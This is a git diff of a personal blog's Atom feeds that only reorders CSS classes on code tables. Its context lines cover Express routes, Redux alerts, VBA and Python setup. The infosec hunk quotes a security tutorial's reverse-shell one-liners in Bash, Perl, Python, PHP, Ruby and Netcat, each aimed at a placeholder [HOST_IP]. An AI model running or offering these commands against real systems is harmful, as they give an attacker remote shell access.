    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"user_name"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"user_name"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    diff --git a/feeds/excel.atom.xml b/feeds/excel.atom.xml
    index 26ae6566..14c936f7 100644
    --- a/feeds/excel.atom.xml
    +++ b/feeds/excel.atom.xml
    @@ -89,7 +89,7 @@
     <p>When I came across this problem, after researching the internet I stumbled across a similar question on Stackoverflow:</p>
     <p><a href="https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1">https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1</a></p>
     <p>With one of the answers from <a href="https://stackoverflow.com/users/445425/chris-neilsen">Chris Neilsen</a> being:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -158,7 +158,7 @@
     <li><code>iCol</code> - The column index we want to return</li>
     </ul>
     <p>Without further ado, here is the function. Note that another function <code>GetListObject</code> is used to find the table in question; see <a href="#getlistobject-function">GetListObject Function</a> for more information on this. Otherwise you can use <code>Application.Worksheets(sheetName)</code>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -208,7 +208,7 @@
     <h2 id="getlistobject-function">GetListObject Function</h2>
     <p>Similarly, the GetListObject function was also found on Stackoverflow, by the user <a href="https://stackoverflow.com/users/20151/andrewd">AndrewD</a>:</p>
     <p><a href="https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba">https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/infosec.atom.xml b/feeds/infosec.atom.xml
    index bc93ac96..b175ae5b 100644
    --- a/feeds/infosec.atom.xml
    +++ b/feeds/infosec.atom.xml
    @@ -114,27 +114,27 @@
     </ol>
     <p>Following this is a list of commands that you could execute to get a reverse connection in different supported languages, where the variable to change is denoted by <code>[HOST_IP]</code> (the port can optionally be changed as well). Note that these are all 'one-liners', so they can be executed in input boxes.</p>
     <h4 id="bash">Bash</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>bash -i &gt;<span class="p">&amp;</span> /dev/tcp/<span class="o">[</span>HOST_IP<span class="o">]</span>/8080 <span class="m">0</span>&gt;<span class="p">&amp;</span><span class="m">1</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>bash -i &gt;<span class="p">&amp;</span> /dev/tcp/<span class="o">[</span>HOST_IP<span class="o">]</span>/8080 <span class="m">0</span>&gt;<span class="p">&amp;</span><span class="m">1</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="perl">PERL</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">perl</span> <span class="o">-</span><span class="n">e</span> <span class="s">'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">perl</span> <span class="o">-</span><span class="n">e</span> <span class="s">'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="python">Python</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="php">PHP</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="x">php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="x">php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="ruby">Ruby</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">ruby</span> <span class="o">-</span><span class="n">rsocket</span> <span class="o">-</span><span class="n">e</span><span class="s1">'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">ruby</span> <span class="o">-</span><span class="n">rsocket</span> <span class="o">-</span><span class="n">e</span><span class="s1">'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="netcat">Netcat</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>nc -e /bin/sh <span class="o">[</span>HOST_IP<span class="o">]</span> <span class="m">8080</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>nc -e /bin/sh <span class="o">[</span>HOST_IP<span class="o">]</span> <span class="m">8080</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h3 id="local-file-inclusion">Local File Inclusion</h3>
    @@ -144,7 +144,7 @@
     <ol>
     <li>Create a PHP file with the following:</li>
     </ol>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    diff --git a/feeds/javascript.atom.xml b/feeds/javascript.atom.xml
    index 7f4fc919..6b4b45d6 100644
    --- a/feeds/javascript.atom.xml
    +++ b/feeds/javascript.atom.xml
    @@ -4,7 +4,7 @@
     <p>Next, in the <code>draw</code> function, which is called repeatedly while the browser has the page open, we loop through all the objects in the array and draw a circle (an ellipse with equal radii), colouring it according to how big its radius is (this is so we can watch it fade as it grows). We make use of the <code>stroke</code> function to define the colour of the lines for what we'll be drawing in that instance. If a drop has become too big we remove it from the array and add a new random drop; if it's still undersize we increase its radius and colour.</p>
     <p>Finally, to add interactivity, we make use of the <code>mouseIsPressed</code> variable to determine if the user has clicked on the visualization, and add a drop into the array at the X &amp; Y position where the user clicked.</p>
     <p align="center"><iframe frameborder="0" height="400" src="https://editor.p5js.org/JackMcKew/embed/u2ga-k6rk" width="100%"></iframe></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -118,7 +118,7 @@
     </code></pre></div>
     </td></tr></tbody></table></body>API Routes in Node.js2020-10-02T00:00:00+10:002020-10-02T00:00:00+10:00Jack McKewtag:jackmckew.dev,2020-10-02:/api-routes-in-nodejs.html<body><p>First off what's an API and more specifically what's an API route? API stands for Application Programming Interface, meaning it's how to communicate with the system you are creating. A route within an API is a specific path to take to get specific information or data out of. This post …</p></body><body><p>First off what's an API and more specifically what's an API route? API stands for Application Programming Interface, meaning it's how to communicate with the system you are creating. A route within an API is a specific path to take to get specific information or data out of. This post will dive into how to set up API routes in Nodejs with express.</p>
     <p>We start by 'importing' express into our route and instantiating a router from the express library.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
     <span class="kd">const</span> <span class="nx">router</span> <span class="o">=</span> <span class="nx">express</span><span class="p">.</span><span class="nx">Router</span><span class="p">();</span>
     </code></pre></div>
    @@ -163,7 +163,7 @@
     <p>These 4 methods make up the basic CRUD functionality (Create, Read, Update and Delete) of an application.</p>
     <h2 id="post">POST</h2>
     <p>Let's create a scaffold <code>POST</code> method in node.js.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="kd">function</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span><span class="nx">res</span><span class="p">)</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'POST request to homepage'</span><span class="p">);</span>
    @@ -171,7 +171,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Similarly to do this asynchronously with arrow functions:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span><span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'POST request to homepage'</span><span class="p">);</span>
    @@ -179,7 +179,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>As we can see above, the first argument to our API route method is the path, and the second is the callback function (what should happen when this path is hit). The callback can be a single function, an array of functions, a series of functions (separated by commas), or a combination of all of these. This is useful if you want to perform validation before the final POST handler runs. An example of this is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,[</span><span class="nx">checkInputs</span><span class="p">()],</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'POST request to homepage and inputs are valid'</span><span class="p">);</span>
    @@ -188,7 +188,7 @@
     </td></tr></tbody></table>
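The `checkInputs()` call above is a placeholder the post doesn't define. As a hypothetical sketch (names and the validation rule are assumptions), such a middleware factory simply returns a function with Express's `(req, res, next)` signature, where calling `next()` hands control to the next handler in the chain:

```javascript
// Hypothetical sketch of a checkInputs middleware factory (not from the post).
// Express middleware is any function with the (req, res, next) signature.
function checkInputs() {
  return function (req, res, next) {
    const body = req.body || {};
    if (typeof body.msg !== 'string' || body.msg.length === 0) {
      // Reject the request before it reaches the final route handler
      return res.status(400).json({ error: 'msg is required' });
    }
    next();
  };
}
```

The router then runs this before the final handler, exactly as in the `router.post('/', [checkInputs()], ...)` example above.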
     <h2 id="get">GET</h2>
     <p>All the methods within Express.js follow the same principles so to create a scaffold <code>GET</code> request:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'GET request to homepage'</span><span class="p">);</span>
    @@ -197,7 +197,7 @@
     </td></tr></tbody></table>
     <h2 id="put">PUT</h2>
     <p>Similarly:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">put</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'PUT request to homepage'</span><span class="p">);</span>
    @@ -206,7 +206,7 @@
     </td></tr></tbody></table>
     <h2 id="delete">DELETE</h2>
     <p>Similarly:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="k">delete</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
    <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'DELETE request to homepage'</span><span class="p">);</span>
    @@ -238,7 +238,7 @@
     </tbody>
     </table>
     <p>An example of using all of the arguments is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -255,14 +255,14 @@
     <p><img alt="Redux State Diagram" class="img-fluid" src="https://jackmckew.dev/img/redux-diagram.png"/></p>
     <p>Let's use <code>react-redux</code> to build a system with which we can alert users when things trigger. For this we will need to build an action, a reducer and a component to display the alert.</p>
     <p>To ensure that these three components speak the same language, we need to initialise types which will represent the states being passed around. Each of these variables contains a string; for our alert system we need two:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">export</span> <span class="kd">const</span> <span class="nx">SET_ALERT</span> <span class="o">=</span> <span class="s2">"SET_ALERT"</span>
     <span class="k">export</span> <span class="kd">const</span> <span class="nx">REMOVE_ALERT</span> <span class="o">=</span> <span class="s2">"REMOVE_ALERT"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="action">Action</h2>
     <p>We'll start by creating the action which will signify when an alert is triggered. We want all of our alerts to be unique so that multiple alerts can be handled without a problem, for which we will use <code>uuid</code>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -305,7 +305,7 @@
     </td></tr></tbody></table>
     <p>The action is declared as a function which takes in 3 arguments (2 required): <code>msg</code>, <code>alertType</code> and <code>timeout</code>. We then call the dispatch function with an object constructed from the arguments, and after the specified timeout we dispatch another object to remove the same alert.</p>
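<p>As a rough, framework-free sketch of the action creator described above (the shapes here are assumptions for illustration: actions are <code>{ type, payload }</code> objects, and <code>fakeUuid</code> stands in for the <code>uuid</code> package so the snippet is self-contained):</p>

```javascript
// Hedged sketch of a setAlert action creator, not the post's exact code.
// Assumption: action objects are shaped { type, payload }.
const SET_ALERT = "SET_ALERT";
const REMOVE_ALERT = "REMOVE_ALERT";

let counter = 0;
const fakeUuid = () => String(++counter); // stand-in for uuid.v4()

// Curried form: returns a function of dispatch (enabled by redux-thunk).
const setAlert = (msg, alertType, timeout = 5000) => (dispatch) => {
  const id = fakeUuid();
  dispatch({ type: SET_ALERT, payload: { msg, alertType, id } });
  // After the timeout, dispatch a second action removing the same alert.
  setTimeout(() => dispatch({ type: REMOVE_ALERT, payload: id }), timeout);
};

// Usage with a recording dispatch instead of a real store:
const dispatched = [];
setAlert("Saved!", "success", 10)((action) => dispatched.push(action));
console.log(dispatched[0].type); // SET_ALERT is dispatched synchronously
```

<p>In a real app the outer call would be <code>store.dispatch(setAlert("Saved!", "success"))</code>, with <code>redux-thunk</code> invoking the inner function.</p>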
     <p>Note that we curry the dispatch function in this case; this is only possible by using the middleware <code>redux-thunk</code>. The same action can also be represented as:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -323,7 +323,7 @@
     <blockquote>
     <p>This post won't go into detail around how to build a React component, which you can find over at another post: [INSERT REACT COMPONENT POST]</p>
     </blockquote>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -371,7 +371,7 @@
     <p>To break it down, we've created a React component (class) <code>Alert</code> which takes in <code>alerts</code> as an array, verifies it isn't null or empty, and finally iterates over each element in the <code>alerts</code> array to return a <code>div</code> stylized with the appropriate information.</p>
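<p>The component's core logic can be sketched framework-free (illustrative only; the real component returns stylized JSX <code>div</code>s, whereas this stand-in returns plain strings):</p>

```javascript
// Sketch of the Alert component's iteration logic: verify the alerts array
// isn't null or empty, then map each alert to a rendered representation.
const renderAlerts = (alerts) =>
  alerts !== null && alerts.length > 0
    ? alerts.map((alert) => `[${alert.alertType}] ${alert.msg}`)
    : null;

console.log(renderAlerts([{ id: "1", msg: "Saved!", alertType: "success" }]));
```

<p>Returning <code>null</code> for an empty list mirrors React's convention that a component rendering <code>null</code> renders nothing.</p>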
     <h2 id="reducer">Reducer</h2>
     <p>Lastly we have the reducer which we want to handle all the states that can be created by the <code>alert</code> action. Luckily we can do this with a switch statement:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -419,7 +419,7 @@
     </blockquote>
     <p>Let's create a file <code>Landing.js</code> (which could similarly be named <code>Landing.jsx</code> for the React-specific file extension, <code>Landing.ts</code> for TypeScript, or <code>Landing.tsx</code> for the React-specific TypeScript extension). This is followed by importing all the necessary requirements for our JavaScript file.</p>
     <h2 id="import-requirements">Import Requirements</h2>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">import</span> <span class="nx">React</span> <span class="nx">from</span> <span class="s2">"react"</span><span class="p">;</span>
    @@ -434,7 +434,7 @@
     <p><code>PropTypes</code> is a way of implementing runtime type checking for React props. If TypeScript is used for the project, this adds somewhat redundant extra type checking, but we can never have enough of that!</p>
     <h2 id="the-component">The Component</h2>
     <p>Now that we've imported everything that we need, it's time to actually create the component! A component in React is a function, where the props are the inputs and the element to be rendered is the return statement. We do this with an arrow function (aka Lambda function) for clarity.</p>
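<p>The idea can be sketched framework-free before looking at the full component (illustrative only; <code>Greeting</code> is a hypothetical component, and a plain string stands in for the JSX element a real component would return):</p>

```javascript
// A React component is conceptually a function from props to a rendered
// element. Here an arrow function takes a destructured props object and
// returns a string in place of JSX, keeping the sketch self-contained.
const Greeting = ({ name }) => `<h1>Hello ${name}</h1>`;

console.log(Greeting({ name: "Jack" }));
```
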
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -492,7 +492,7 @@
     <blockquote>
     <p>This post is not intended to go through how to set up the redux store or interactions with it.</p>
     </blockquote>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -507,7 +507,7 @@
     <h2 id="conclusion">Conclusion</h2>
     <p>Now we can use the statement <code>import Landing from './Landing'</code> and use our component just as we used <code>Link</code> in our app!</p>
     <p>The full source of <code>Landing.js</code> is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/machine-learning.atom.xml b/feeds/machine-learning.atom.xml
    index 40b2d28c..8f86b4c1 100644
    --- a/feeds/machine-learning.atom.xml
    +++ b/feeds/machine-learning.atom.xml
    @@ -191,7 +191,7 @@ Book's answer: Cross-validation is a technique that makes it possible to compare
     </ul>
     <h3 id="supervised-learning">Supervised Learning</h3>
     <p>Most practical machine learning algorithms use supervised learning. Supervised learning is where you have one or more input variables (x) and output variable(s) (y), and you use an algorithm to learn the mapping function from the input to the output.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>y = f(x)
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>y = f(x)
     </code></pre></div>
     </td></tr></tbody></table>
     <p>The end goal of this algorithm is to approximate the mapping function accurately enough that when you have a new data input (x), you can predict what the result (y) for that data would be.</p>
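<p>As a toy illustration (not from the original post), a linear mapping f can be approximated from example (x, y) pairs with an ordinary least-squares fit, then used to predict y for an unseen input:</p>

```javascript
// Toy supervised-learning example: recover f(x) = 2x + 1 from (x, y) pairs
// via least squares, then predict the output for a new input.
const xs = [0, 1, 2, 3];
const ys = xs.map((x) => 2 * x + 1); // "labels" generated by the true mapping

const mean = (arr) => arr.reduce((a, b) => a + b, 0) / arr.length;
const mx = mean(xs);
const my = mean(ys);

// Closed-form simple linear regression: slope = cov(x, y) / var(x).
const slope =
  xs.reduce((acc, x, i) => acc + (x - mx) * (ys[i] - my), 0) /
  xs.reduce((acc, x) => acc + (x - mx) ** 2, 0);
const intercept = my - slope * mx;

const f = (x) => slope * x + intercept; // the learned mapping
console.log(f(10)); // prediction for a new input
```
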
    diff --git a/feeds/principles.atom.xml b/feeds/principles.atom.xml
    index 0b082225..a221bc42 100644
    --- a/feeds/principles.atom.xml
    +++ b/feeds/principles.atom.xml
    @@ -23,7 +23,7 @@
     <p>Now once these are installed (if you put them in the default location), Python will by default be located in: C:\Users\Jack\AppData\Local\Programs\Python\Python37-32. For the next few steps, to ensure we are setting up virtual environments for our projects, open a command prompt here if you are on Windows. This will look something like this:</p>
     <p><img alt="image-11.png" class="img-fluid" src="https://jackmckew.dev/img/image-11.png"/></p>
     <p>The 'cd' command in Windows (and other OSes) stands for change directory; follow this with a path and you will be brought to that directory. Whenever I first install Python, I like to update pip to its latest release; to do this, use the following command in this window:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>python -m pip install --upgrade pip
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>python -m pip install --upgrade pip
     </code></pre></div>
     </td></tr></tbody></table>
     <p>With pip upgraded to its current release, it's time to install some very helpful packages for setting up projects: virtualenv and cookiecutter. To install these, navigate to the Scripts folder within the current directory with cd ('cd Scripts') and run 'pip.exe install virtualenv cookiecutter'; pip will then work its magic and install these packages for you.</p>
    @@ -39,24 +39,24 @@ Now something that I personally like to do is add this folder to your system env
     <p>If you chose to do this step, you will now be able to create virtual environments and cookiecutter templates without having to specify the directory to the executables.</p>
     <p>It's now time to create a project from scratch. So navigate to where you like to keep your projects (mine are mostly in Documents\Github\) but you can put them anywhere you like. Now run command prompt again (or keep the one you have open) and navigate to the dedicated folder (or folders) using cd.</p>
     <p>For most of my projects lately being of data science in nature, I like to use the cookiecutter-data-science template which you can find all the information about here: <a href="https://drivendata.github.io/cookiecutter-data-science/">https://drivendata.github.io/cookiecutter-data-science/</a>. To then create a project it is as simple as running:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>cookiecutter https://github.com/drivendata/cookiecutter-data-science
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>cookiecutter https://github.com/drivendata/cookiecutter-data-science
     </code></pre></div>
     </td></tr></tbody></table>
     <p><img alt="image-3.png" class="img-fluid" src="https://jackmckew.dev/img/image-3.png"/></p>
     <p>Provide as much information as you wish in answer to the questions, and you will now have a folder created wherever you ran the command, with all the relevant sections from the template.</p>
     <p>Whenever starting a new Python project, my personal preference is to keep the virtual environment within the project directory; however, this is not always common practice. To create a virtual environment for our Python packages, navigate into the project and run (if you added Scripts to your Path):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>virtualenv env
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>virtualenv env
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This will then initialise a folder ('env') within your current directory and install a copy of Python and all its relevant tools into it.</p>
     <p>Before we go any further, this is the point at which I like to initialise a git repository. To do this, run git init from your command line within the project directory.</p>
     <p>Now to finish off the final steps of the workflow that will affect day-to-day development, I like to use pre-commit hooks to reformat my code with black and, on some projects, check for PEP 8 conformance with flake8 on every commit to my project's repository. This is purely a personal preference on how you would like to work; others like to use pytest and more to ensure their projects are working as intended, however I am not at that stage just yet.</p>
